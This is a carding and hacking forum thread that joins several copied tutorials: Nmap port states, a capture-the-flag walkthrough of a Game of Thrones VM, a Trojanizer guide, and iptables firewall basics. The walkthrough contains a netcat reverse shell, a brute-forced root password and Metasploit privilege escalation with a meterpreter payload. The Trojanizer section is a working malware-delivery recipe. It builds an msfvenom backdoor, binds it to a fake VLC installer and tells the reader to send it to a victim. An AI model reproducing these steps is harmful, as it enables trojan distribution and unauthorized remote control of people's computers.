[Guide] Comprehensive Guide on Nmap Port Status

[Guide] Comprehensive Guide on Nmap Port Status - Printable Version

+- Blackhat Carding Forum | Carding Forum - Credit Cards - Hacking Forum - Cracking Forum | Bhcforums.cc (https://bhcforums.cc)
+-- Forum: Carding Zone (https://bhcforums.cc/Forum-Carding-Zone)
+--- Forum: Carders Home (https://bhcforums.cc/Forum-Carders-Home)
+--- Thread: [Guide] Comprehensive Guide on Nmap Port Status (/Thread-Guide-Comprehensive-Guide-on-Nmap-Port-Status)

[Guide] Comprehensive Guide on Nmap Port Status - NINZA - 05-14-2020

Hello friends, several times you might have used NMAP to performing Network scanning for enumerating active Port services of target machine but in some scenarios you don’t get simple message if a port open or close.
Let’s Begin
Requirement

Attacker’s IP: 192.168.1.109 [Kali Linux]
Target’s IP: 192.168.1.119 [Ubuntu]

The states of ports are not their essential properties; it depicts how nmap sees them. In nmap a port is divided into six states:

Open: This state means that an application on the target machine is listening for connections/packets on that port.
Closed: This state means ports have no application listening on them, though they could open up at any time.
Filtered: This state means that a firewall, filter, or other network obstacle is blocking the port so that Nmap cannot tell whether it is open or closed.
Unfiltered: ports are classified as unfiltered when they are responsive to Nmap’s probes, but Nmap cannot determine whether they are open or closed.
Open/Filtered: This indicates that the port was filtered or open but Nmap couldn’t establish the state.
Closed/Filtered: This indicates that the port was filtered or closed but Nmap couldn’t establish the state.

Open Port
In this case a service or application running on a port is actively accepting TCP, UDP connections. We send TCP packets to port 80 of target machine. We find that the port is open.
nmap -p80 192.168.1.119
1
nmap -p80 192.168.1.119
[Image: 1.png?w=687&ssl=1]

We take a look at wireshark and find that 3 way-handshake occurs as given below.

Nmap sends SYN packet on port 80
Nmap received SYN, ACK packet as response from port 80 which denotes port 80 is open.
Nmap sends RST packet

Closed Port
In this case a service or application on a port is accessible but no application is running on it. When a port is in closed state it sends RST with ACK packet when it receives TCP SYN packet
nmap -p80 192.168.1.119
1
nmap -p80 192.168.1.119
Now we have used SYN scan to send TCP SYN packets on port 80 of target machine and found that the target is closed. That is because as soon as it receives TCP SYN packet it sends back TCP RST, ACK packet.
[Image: 4.png?w=687&ssl=1]

We will check wireshark to find more information, as expected as soon as the target machine received TCP SYN packet it replied with TCP RST and NMAP interpreted it as port is closed.

Nmap sends SYN packet on port 80
Nmap received RST, ACK packet as response from port 80 which denotes port 80 is closed.

Filtered Port
In this case Nmap is unable to determine whether a port is open because packet filtering is preventing the packets from reaching the port. When a packet is dropped Nmap retries several times just in case the probe was dropped due to network congestion rather than filtering. This slows down the scan dramatically.
Let’s use iptables to drop TCP packets on the target machine.
iptables -I INPUT -p tcp -j DROP
1
iptables -I INPUT -p tcp -j DROP

Now when we scan the target machine, the packets will be dropped as soon as it receives TCP packets.
nmap -p80 192.168.1.119
1
nmap -p80 192.168.1.119
From given below image you can observe that it is now showing state “filtered” for port 80.
[Image: 7.png?w=687&ssl=1]

Let’s take a look at wireshark we find that when Nmap send TCP SYN packet we get no reply from the target machine. This means that a packet filter or firewall is dropping our packets.
[Image: 8.png?w=687&ssl=1]

Unfiltered Port
The unfiltered state means that a port is accessible, but Nmap is unable to determine whether it is open or closed. Only the ACK scan, which is used to map firewall rulesets, classifies ports into this state. Scanning unfiltered ports with other scan types such as Window scan, SYN scan, or FIN scan, may help resolve whether the port is open.
We use iptables to drop any TCP packet coming to port 80 in target machine.
iptables -I INPUT -p tcp --dport=80 -j DROP
1
iptables -I INPUT -p tcp --dport=80 -j DROP

Now we use nmap ACK scan to scan the target machine to check if there is any firewall or not.
nmap –sA -p22,80 192.168.1.119
1
nmap –sA -p22,80 192.168.1.119
As we can see in given below image the port without firewall shows unfiltered as Nmap is unable to determine if it is open or close.
[Image: 12.png?w=687&ssl=1]

We can see in wireshark that for port 22 we get a RST packet whereas in case of port 80 the packet is dropped by the target machine.
[Image: 13.png?w=687&ssl=1]

Open|Filtered Port
In this case nmap is unable to determine if a port is open or filtered. This occurs for scan types in which open ports give no response. The lack of response could also mean that a packet filter dropped the probe or any response it elicited. So Nmap does not know for sure whether the port is open or being filtered. The UDP, IP protocol, FIN, NULL, and Xmas scans classify ports this way.
Let’s use nmap Xmas scan to scan the target machine.
nmap -sX -p80 192.168.1.119
1
nmap -sX -p80 192.168.1.119
As we can see the nmap scan shows us the port to be open | filtered.
[Image: 14.1.png?w=687&ssl=1]

We will check wireshark to analyze the packets sent by nmap and we can see we don’t get a reply even if the port is open.
[Image: 14.2.png?w=687&ssl=1]

Closed|Filtered Port
This state is used when Nmap is unable to determine whether a port is closed or filtered. It is only used for the IP ID idle scan.
We use iptables on our target machine to drop incoming TCP packets on the target machine.
iptables -I INPUT -p tcp -j DROP
1
iptables -I INPUT -p tcp -j DROP

We will do an IP ID idle scan on the target machine using 192.168.1.107 as our zombie.
nmap -p80 -sI 192.168.1.107 192.168.1.119
1
nmap -p80 -sI 192.168.1.107 192.168.1.119
As we can see in idle scan the zombie it is showing state closed|filtered for port 80.
[Image: 14.png?w=687&ssl=1]

An idle scan consists of three steps that are repeated for each port:

Probe the zombie’s IP ID and record it.
Forge a SYN packetfrom the zombie and send it to the desired port on the target. Depending on the port state, the target’s reaction may or may not cause the zombie’s IP ID to be incremented.
Probe the zombie’s IP ID again. The target port state is then determined by comparing this new IP ID with the one recorded in step 1.

We check Wireshark and find that find the entire process.
[Image: 15.png?w=687&ssl=1]

Source:

[To see content please register here]

Hello friends! Today we are going to take another CTF challenge known as Game of Thrones. The credit for making this vm machine goes to “OscarAkaElvis” and it is another capture the flag challenge in which our goal is to get all the flags to complete the challenge. You can download this VM

[To see content please register here]

.
Let’s Breach!!!
Let us start form getting to know the IP of VM (Here, I have it at 192.168.1.133 but you will have to find your own)
netdiscover
1
netdiscover
[Image: 1.png?w=687&ssl=1]

Use nmap for port enumeration
nmap -p- -sV 192.168.1.133
1
nmap -p- -sV 192.168.1.133
[Image: 2.png?w=687&ssl=1]

We find that port 80 is running http, so we open the ip in our browser.
[Image: 3.png?w=687&ssl=1]

We take a look at the source code and find the flag syntax.
[Image: 4.1.png?w=687&ssl=1]

Use dirb to enumerate the ports.
dirb

[To see content please register here]

1
dirb

[To see content please register here]

We find the robots.txt file, we open it and find few directories.
[Image: 5.png?w=687&ssl=1]

We open the directory /secret-island/ using user-agent Three-eyed-raven
[Image: 6.png?w=687&ssl=1]

We open it and find a link to a map.
[Image: 7.png?w=687&ssl=1]

When we open the map we find the location of all the flags.
[Image: 8.png?w=687&ssl=1]

We open the directory called /direct-access-to-kings-landing/ using user-agent Three-eyed-raven.
[Image: 9.png?w=687&ssl=1]

We open the directory and take a look at the source code and find what looks like port for port knocking and to user as oberynmartell.
[Image: 10.png?w=687&ssl=1]

We then find /h/i/d/d/e/n/ directory using dirb and we open it.
[Image: 11.png?w=687&ssl=1]

We take a look at the source code and find password for oberynmartell.
[Image: 12.png?w=687&ssl=1]

We use ftp to connect we use the username and password we previously found to login. We get the first flag as soon we login.
[Image: 13.png?w=687&ssl=1]

We find two files and download through ftp and find a file that gives us the type of hash it uses.
We save the hash in a file.
[Image: 14.png?w=687&ssl=1]

Now we use john the ripper to decrypt the file and find the password to be stark
john --format=dynamic_2008 hash.txt
1
john --format=dynamic_2008 hash.txt
[Image: 15.png?w=687&ssl=1]

Now we use mcrypt to decrypt the encrypted file we found in the ftp server.
mcrypt -d the_wall.txt.nc
1
mcrypt -d the_wall.txt.nc
[Image: 16.png?w=687&ssl=1]

We now add the domain winterfell.7kingdoms.ctf to /etc/hosts and open the link found in the file.
[Image: 17.png?w=687&ssl=1]

We login using the username and password to login, and find a page with two images.
[Image: 18.png?w=687&ssl=1]

We take a look at the source code, and we find the second flag.
[Image: 19.png?w=687&ssl=1]

Along with the second flag we also find a hint that it contains something, so we download the file and use strings to take a look inside the file and find a domain name.
strings stark_shield.jpg
1
strings stark_shield.jpg
[Image: 20%2B%25281%2529.png?w=687&ssl=1]

It hints us that TXT record will contain something useful so we use nslookup to check the TXT records. We had to make some changes to the domain name to make it valid, and we find our 3rd flag.
nslookup -q=txt Timef0rconqu3rs.7Kingdoms.ctf 192.168.1.133
1
nslookup -q=txt Timef0rconqu3rs.7Kingdoms.ctf 192.168.1.133
[Image: 21.png?w=687&ssl=1]

Now we add the new domain name to /etc/hosts and open the link found in TXT record above.
[Image: 22.png?w=687&ssl=1]

We use login the username and password we find in the TXT records.
[Image: 23.png?w=687&ssl=1]

We use the search provided by the site to check for vulnerabilities.
[Image: 24.jpg?w=687&ssl=1]

We use the file manager module and it opened a file manager that lets us access few files.
[Image: 25.png?w=687&ssl=1]

In /home/aryastark folder we find a file called flag.txt
[Image: 26.1.jpg?w=687&ssl=1]

We download the file and open it in our system and find our 4th flag.
[Image: 26.2.png?w=687&ssl=1]

Now we got a hint to access a database now we know the server is running postgresql, we connect to it using the username password available in the file we find earlier.
psql –h 192.168.1.133 –u robinarryn –d mountainandthevale
1
psql –h 192.168.1.133 –u robinarryn –d mountainandthevale
[Image: 26.png?w=687&ssl=1]

We find a table called flag, we open it and find a base64 encoded string.
[Image: 27.png?w=687&ssl=1]

We decode the base64 encode string and find our 5th flag.
[Image: 28.png?w=687&ssl=1]

Now we check the other tables to check if we miss anything. In one of the tables we find a few names
select * from arya_kill_list
1
select * from arya_kill_list
In arya_kill_list we find these names that seems useful.
[Image: 56.png?w=687&ssl=1]

Searching through the database we find a rot16 encoded string.
[Image: 57.png?w=687&ssl=1]

We now convert the rot16 encoded flag and find a name of database along with the password. It also gives us a hint to use the username we find in the table above.
[Image: 58.png?w=687&ssl=1]

After enumerating the username we find that TheRedWomanMelisandre is the username.
[Image: 59.png?w=687&ssl=1]

Now we check the the table and find a secret flag.
[Image: 60.png?w=687&ssl=1]

Now we know kingdom of reach is in imap as it was shown in the map, now we use the number we find earlier to port knock.
knock 192.168.1.133 3487 64535 12345
1
knock 192.168.1.133 3487 64535 12345

Now we do a nmap scan to check if any new port opened on the server, we find that port 143 that is running imap opened.
nmap -p- 192.168.1.133
1
nmap -p- 192.168.1.133
[Image: 30.png?w=687&ssl=1]

We use netcat to connect to it, we use the username and password we find in the hint earlier.
nc 192.168.1.133 143
1
nc 192.168.1.133 143
[Image: 31.1.png?w=687&ssl=1]

In the inbox we find our 6th flag, we also get a hint to use port 1337 and a username and password is given to login.
[Image: 31.2.png?w=687&ssl=1]

We login into the site and find that it is git site.
[Image: 31.png?w=687&ssl=1]

After enumerating through the files we find that this site is vulnerable to command injection and a hint to use mysql.
[Image: 32.png?w=687&ssl=1]

We use netcat to get reverse shell on the site we use “”

Code:
The contents of this section are hidden for your group

Register or Login
to execute our code.
nc -e /bin/bash 192.168.1.116 1234
1
nc -e /bin/bash 192.168.1.116 1234
[Image: 33.png?w=687&ssl=1]

Now we setup our listener using netcat as soon as we execute our command we get a reverse shell.
nc -lvp 1234
1
nc -lvp 1234
[Image: 34.png?w=687&ssl=1]

On the webpage earlier we find hex encoded string when we decode it we get a location of a file:/home/tyrionlannister/checkpoint.txt, so we open it and find username, password and name of the database we need to look for.
[Image: 35.png?w=687&ssl=1]

Now we use the information above to find the tables available in the database.
[Image: 36.png?w=687&ssl=1]

We find the name of the table, it is called iron_throne, we take a look inside the table.
[Image: 37.png?w=687&ssl=1]

Now we find a morse code when we decode it we find it converts to /etc/mysql/flag, when we try to access it gives that file not found, earlier we find a hint that states we don’t have enough privileges so we try to take a look at our privileges.
[Image: 38.png?w=687&ssl=1]

We find that we can import files into the database. So first we create a table named Flag.
[Image: 39.png?w=687&ssl=1]

Now we import the file into our table.
[Image: 40.png?w=687&ssl=1]

Now when we access it we find our 7th flag. We also get username and password for ssh login.
[Image: 41.png?w=687&ssl=1]

Now we use this to login through ssh.
ssh [email protected]
1
ssh [email protected]
[Image: 42.png?w=687&ssl=1]

Enumerating through the system we find two files called digger.txt and checkpoint.txt, checkpoint.txt contains a hint to login through ssh at ip 172.25.0.2 and use the file digger.txt to login through ssh.
[Image: 43.1.png?w=687&ssl=1]

We download digger.txt to our system through ssh.
scp digger.txt [email protected]:
1
scp digger.txt [email protected]:
[Image: 43.png?w=687&ssl=1]

We use local tunnelling to bind it to our port 2222.
ssh [email protected] –L 2222:172.25.0.2:22 –N
1
ssh [email protected] –L 2222:172.25.0.2:22 –N
[Image: 44.png?w=687&ssl=1]

Now we use hydra to login through ssh to using username as root and use digger.txt file to brute force.
We find that for the username root we have password “Dr4g0nGl4ss!”
[Image: 45.png?w=687&ssl=1]

We use this to login through ssh, we use localhost to connect as we have done ssh local tunnel to connect to trough ssh.
[Image: 46.png?w=687&ssl=1]

Now we enumerating through the files we find our secret flag. We also get a username and password to login through ssh.
[Image: 47.png?w=687&ssl=1]

We use metasploit to connect through ssh using this username and password.
msf > use auxiliary/scanner/ssh/ssh_login
msf auxiliary(scanner/ssh/ssh_login) > set rhosts 192.168.1.133
msf auxiliary(scanner/ssh/ssh_login) > set username branstark
msf auxiliary(scanner/ssh/ssh_login) > set password Th3_Thr33_Ey3d_Raven
msf auxiliary(scanner/ssh/ssh_login) > run
1
2
3
4
5
msf > use auxiliary/scanner/ssh/ssh_login
msf auxiliary(scanner/ssh/ssh_login) > set rhosts 192.168.1.133
msf auxiliary(scanner/ssh/ssh_login) > set username branstark
msf auxiliary(scanner/ssh/ssh_login) > set password Th3_Thr33_Ey3d_Raven
msf auxiliary(scanner/ssh/ssh_login) > run
[Image: 48.png?w=687&ssl=1]

After searching for some obvious possibilities to escalate privileges such as executables with the setuid bit set or exploits for the kernel, we noticed that this server is docker based. So we use the docker privilege escalation in metasploit.
msf > use exploit/linux/local/docker_daemon_privilege_escalation
msf exploit(linux/local/docker_daemon_privilege_escalation) > set lhost 192.168.1.116
msf exploit(linux/local/docker_daemon_privilege_escalation) > set payload linux/x86/meterpreter/reverse_tcp
msf exploit(linux/local/docker_daemon_privilege_escalation) > set session 1
msf exploit(linux/local/docker_daemon_privilege_escalation) > run
1
2
3
4
5
msf > use exploit/linux/local/docker_daemon_privilege_escalation
msf exploit(linux/local/docker_daemon_privilege_escalation) > set lhost 192.168.1.116
msf exploit(linux/local/docker_daemon_privilege_escalation) > set payload linux/x86/meterpreter/reverse_tcp
msf exploit(linux/local/docker_daemon_privilege_escalation) > set session 1
msf exploit(linux/local/docker_daemon_privilege_escalation) > run
[Image: 49.png?w=687&ssl=1]

Now we get our escalated session, we now check and find that we are root.
[Image: 50.png?w=687&ssl=1]

Now we enumerate through the files and find password protected zip file called final_battle and a file that tells us how to find the password. It contains a pseudo code that tells us how to create the password using secret flags we found.
[Image: 51.png?w=687&ssl=1]

Now we have obtained 2 secret flag, searching through the files we find that music file contain a secret flag. In the home page we find 2 music file we use exiftool and find that the mp3 file contains the secret flag.
exiftool game_of_thrones.mp3
1
exiftool game_of_thrones.mp3
[Image: 61.png?w=687&ssl=1]

Now we create a code using the pseudocode as reference in python.
[Image: 52.png?w=687&ssl=1]

We run the program and find the password.
[Image: 53.png?w=687&ssl=1]

We use zip to extract the file and use this password.
7z e final_battle
1
7z e final_battle
[Image: 54.png?w=687&ssl=1]

We find that a file called flag.txt was extracted, we open the file and find our final flag.
[Image: 55.png?w=687&ssl=1]

The Trojanizer tool uses WinRAR (SFX) to compress the two files input by the user and transforms it into an SFX executable (.exe) archive. The SFX archive when executed it will run both files (our payload and the legit application at the same time).
How to get Trojanizer?
You can clone using this Github link:
git clone

[To see content please register here]

1
git clone

[To see content please register here]

Now Before Running the Trojanizer, we will create a payload using msfvenom
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.111 lport=4466 -f exe > /root/Desktop/backdoor.exe
1
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.111 lport=4466 -f exe > /root/Desktop/backdoor.exe
[Image: 2.png?w=687&ssl=1]

Running Trojanizer
Open the terminal in the Directory where you have cloned the git file. Here you will find a Trojanizer.sh File run it using
./Trojanizer.sh
1
./Trojanizer.sh
Trojanizer has some prerequisites which it will try to install on the initial run. If it could install you could install manually the below-mentioned prerequisites.
Wine Program Files, WinRAR Software and Zenity.
[Image: 3.png?w=687&ssl=1]

After Loading the Tool, it will ask you if you want to execute the Framework
[Image: 5.png?w=687&ssl=1]

Clicking Yes Will Open a Window Titled Payload to Be Compressed, here we will select the payload that we created using msfvenom at the beginning of the practical.
[Image: 6.png?w=687&ssl=1]

After selecting the payload another window will open titled Legit Application to Trojanize
[Image: 7.png?w=687&ssl=1]

Here we will have to select any legit or original software file (.exe) to bind with our payload. I am binding VLC Player Installer File with my payload.
[Image: 8.png?w=687&ssl=1]

After clicking OK we will be asked for a New Name for the combined file. Keep it like any installer File. For Example vlc-32bit-Installer or vlc-update64 or anything of your choice.
[Image: 9.png?w=687&ssl=1]

Now we will have to select an icon for our combined file. You can choose from the list given by default or you can download any icon file (.ico) from Google.
[Image: 10.png?w=687&ssl=1]

I have downloaded the VLC Icon. As you can see in the above image I am adding the vlc-icon.ico file as an icon.
Note: Trojanizer works with WINRAR and because of that many a times this icon doesn’t bind with the combined file, instead it shows a WinRAR icon. It is a bug we soon hope will be fixed.
After selecting the icon file. You will be granted with this window informing you about the path of the newly payload combined software.
[Image: 11.png?w=687&ssl=1]

Now Let’s Start a Listener on the port we mentioned as a lhost earlier. Start with opening Metasploit Framework by typing
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.1.111
msf exploit(multi/handler) > set lport 4466
msf exploit(multi/handler) > run -j
1
2
3
4
5
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.1.111
msf exploit(multi/handler) > set lport 4466
msf exploit(multi/handler) > run -j
[Image: 12.png?w=687&ssl=1]

Now send the malicious software to the victim by any means you desire.
When the user will open the file, he will be greeted with the normal security warning as it is normally shown.
[Image: 13.png?w=687&ssl=1]

After clicking Run the user will have the VLC installer running and he won’t suspect anything.
[Image: 14.png?w=687&ssl=1]

But as he clicks Run we will also have his meterpreter session as shown below.
[Image: 15.png?w=687&ssl=1]

That’s how we can bind our payload file with any original software file (.exe) using Trojanizer.

Hello friends!! In this article, we are going to discuss on Iptables and its uses. Iptables is a command-line firewall, installed by default on all official Ubuntu distributions. Using Iptables, you can label a set of rules, that will be gone after by the Linux kernel to verify all incoming and outgoing network traffic.
Today we will look at some basic concept of Ipatble using various Iptables options to generate a Filter Table which will filter the incoming and outgoing traffic
Basic Iptables Options
-A: Add this rule to a rule chain.
-L: List the current filter rules.
-m conntrack : Allow filter rules to match based on connection state. Permits the use of the –ctstate option.
–ctstate: Define the list of states for the rule to match on. Valid states are:

NEW – The connection has not yet been seen.
RELATED – The connection is new, but is related to another connection already permitted.
ESTABLISHED – The connection is already established.
INVALID – The traffic couldn’t be identified for some reason.

-m limit: Require the rule to match only a limited number of times. Allows the use of the –limit option.
Useful for limiting logging rules:

–limit – The maximum matching rate, given as a number followed by “/second”, “/minute”, “/hour”, or “/day” depending on how often you want the rule to match. If this option is not used and -m limit is used, the default is “3/hour”.

-p: Describe the connection protocol used.
–dport : The destination port(s) required for this rule. A single port may be given, or a range may be given as start: end, which will match all ports from start to end, inclusive.
-j : Jump to the specified target. By default, iptables allows four targets:

ACCEPT – Accept the packet and stop processing rules in this chain.
REJECT– Reject the packet and notify the sender that we did so, and stop processing rules in this chain.
DROP– Silently ignore the packet, and stop processing rules in this chain.
LOG– Log

-I: Inserts a rule. Takes two options, the chain to insert the rule into, and the rule number it should be.
-I: INPUT 5 would insert the rule into the INPUT chain and make it the 5th rule in the list.
-s: –source – address [/mask] source specification
-d: –destination – address[/mask] destination specification
Iptables follow Ipchain rules which is nothing but the bunch of firewall rules to control incoming and outgoing traffic
Three Important Types Iptable chains
Input Chain: Input chain rule is used to manage the activities of incoming traffic towards the server.
Output Chain: Output chain rule is used to manage the activities of outgoing traffic from your server.
Forward Chain: A forward chain rule is used for adding up rules related to forwarding of an IP packet. This is usually used while you have a Linux machine as router linking two networks collectively.
As described above by default install iptable is available in all Ubuntu distribution but if it is not installed in any Linux based system and you want to install it then execute given below command.
sudo apt-get install iptables
1
sudo apt-get install iptables
By default, iptable is blank which allows all incoming and outgoing connection traffic without filtering them. In order to verify inbuilt rules of iptable, we need to execute the following command which displays the list of rules if added in iptables.
sudo iptables -L -v
1
sudo iptables -L -v
here -L has used for display the chain rules of iptables and -v for complete information.
[Image: 1.png?w=687&ssl=1]

Allow Incoming Traffic
In order to allow traffic for any particular port you can use given below command here we have accepted incoming on port 22 for SSH, 80 for HTTP and 443for HTTPS respectively
sudo iptables -A INPUT -p tcp --dport 22 -j ACCEPT
sudo iptables -A INPUT -p tcp --dport 80 -j ACCEPT
sudo iptables -A INPUT -p tcp --dport 443 -j ACCEPT
1
2
3
sudo iptables -A INPUT -p tcp --dport 22 -j ACCEPT
sudo iptables -A INPUT -p tcp --dport 80 -j ACCEPT
sudo iptables -A INPUT -p tcp --dport 443 -j ACCEPT
So it will allow tcp connection when traffic will coming on port 22, 80 and 443.
[Image: 2.png?w=687&ssl=1]

Drop/Deny Incoming Traffic
In order to deny traffic for any particular port you can use given below command here we have drop incoming on port 21 for FTP and 23 for Telnet respectively
sudo iptables -A INPUT -p tcp --dport 21 -j DROP
sudo iptables -A INPUT -p tcp --dport 23 -j DROP
1
2
sudo iptables -A INPUT -p tcp --dport 21 -j DROP
sudo iptables -A INPUT -p tcp --dport 23 -j DROP
So it will deny tcp connection when traffic will coming on port 21, 23 and give a message Time Out.

Reject Incoming Traffic
Reject and Drop action closely work same in order to obstruct the incoming traffic from establishing a connection with the server only the difference is that, here it will send a message with “ICMP message Port Unreachable” and drop the incoming packet. You can use given below command here we have to reject incoming on port 25 for SMTP.
sudo iptables -A INPUT -p tcp --dport 25 –j REJECT
1
sudo iptables -A INPUT -p tcp --dport 25 –j REJECT
So it will drop tcp connection when traffic will coming on port 25 and give a message Destination Port Unreachable.

Allow Incoming Traffic from Specific IP
In order to allow traffic form only a particular IP to establish a secure connection between server and client you can execute given below command
sudo iptables -A INPUT -s 192.168.1.104 -j ACCEPT
1
sudo iptables -A INPUT -s 192.168.1.104 -j ACCEPT
It will accept packet coming from network 192.168.1.104

Block Specific Network IP
In order to deny traffic form only a particular IP to establish a secure your server from attacker’s IP you can execute given below command
sudo iptables -A INPUT -s 192.168.1.102 -j DROP
1
sudo iptables -A INPUT -s 192.168.1.102 -j DROP
It will deny packet coming from network 192.168.1.102

Block Specific Network Interface
To block a specific network interface, for example, eth0, execute given below command which drops the incoming traffic coming from 10.10.10.10
sudo iptables -A INPUT -i eth0 -s 10.10.10.10 -j DROP
1
sudo iptables -A INPUT -i eth0 -s 10.10.10.10 -j DROP
Here you can change the action to allow traffic from a particular network interface using –j ACCEPT options.

Block Specific IP Range
To block a specific IP range in order to deny, the incoming traffic coming from a specific range of IP. Execute given below command which drops incoming packet coming from IP 192.168.1.100 till IP 192.168.1.200
sudo iptables -A INPUT -m iprange --src-range 192.168.1.100-192.168.1.200 -j DROP
1
sudo iptables -A INPUT -m iprange --src-range 192.168.1.100-192.168.1.200 -j DROP
Here you can change the action to allow traffic from a particular IP range using –j ACCEPT options.

Block Specific Mac Address
To block a specific Mac address in order to deny, the incoming traffic coming from a specific machine. Execute given below command which drops incoming packet coming from given Mac address or attacker machine.
sudo iptables -A INPUT -m mac --mac-source FC:AA:14:6A:9A:A2 -j DROP
1
sudo iptables -A INPUT -m mac --mac-source FC:AA:14:6A:9A:A2 -j DROP
Here you can change the action to allow traffic from a particular Mac address using –j ACCEPT options.

Block Ping Request
Network administrator always concerns with network security, therefore, they always Block Ping request either by using Drop or Reject action, here we are blocking Ping request using DROP option as given in below command.
sudo iptables -A INPUT -p icmp -i eth0 -j DROP
1
sudo iptables -A INPUT -p icmp -i eth0 -j DROP

View List of Applied Chain rules
In order to view our applied chain rules once again, we are going to execute given below command which will dump the list of Iptable rules.
sudo iptables -L
1
sudo iptables -L
From given below image you can observe 4 columns which contain records of IPtable rules.
Here these columns define the following information:
Target: Defines applied action
Prot: stand for Protocol type that can TCP, ICMP or UDP
Option: further option to define the rule, here it is blank
Source: Incoming traffic network IP Address
Destination: Host IP address which will receive incoming traffic packet.
[Image: 11.png?w=687&ssl=1]

Now if someone tries to Ping the server machine as shown in given below image, so here you can read the message “Request timed out” which means the server machine has dropped our ICMP request packet.
[Image: 12.1.png?w=687&ssl=1]

Deleting Any Rule
In order to delete any rule of your Iptable to remove it from inside your filter table, you can use option -D with input rule number. We are going to remove our last rule ICMP drop connection which was at number 12 in the given list of the rule.
sudo iptables -D INPUT 12
1
sudo iptables -D INPUT 12
Here you can replace number 12 from any other number which rule you wish to remove according to your list of rules.

Let’s view our remaining chain rules once again using the -L option as done above. From given below image you can observe that now the list contain only 11 rules and eliminated rule ICMP drop the connection.
[Image: 13.png?w=687&ssl=1]

Flush IPtables
If you want to remove the entire set of rule in order to flush your Iptable then use option -F to flush your ipatble applied rules and execute given below command.

sudo iptables -F
1
sudo iptables -F
Now once again when we had viewed the list of the rule, this time we got the empty table as shown in the given below image.
[Image: 14.png?w=687&ssl=1]

Source:

[To see content please register here]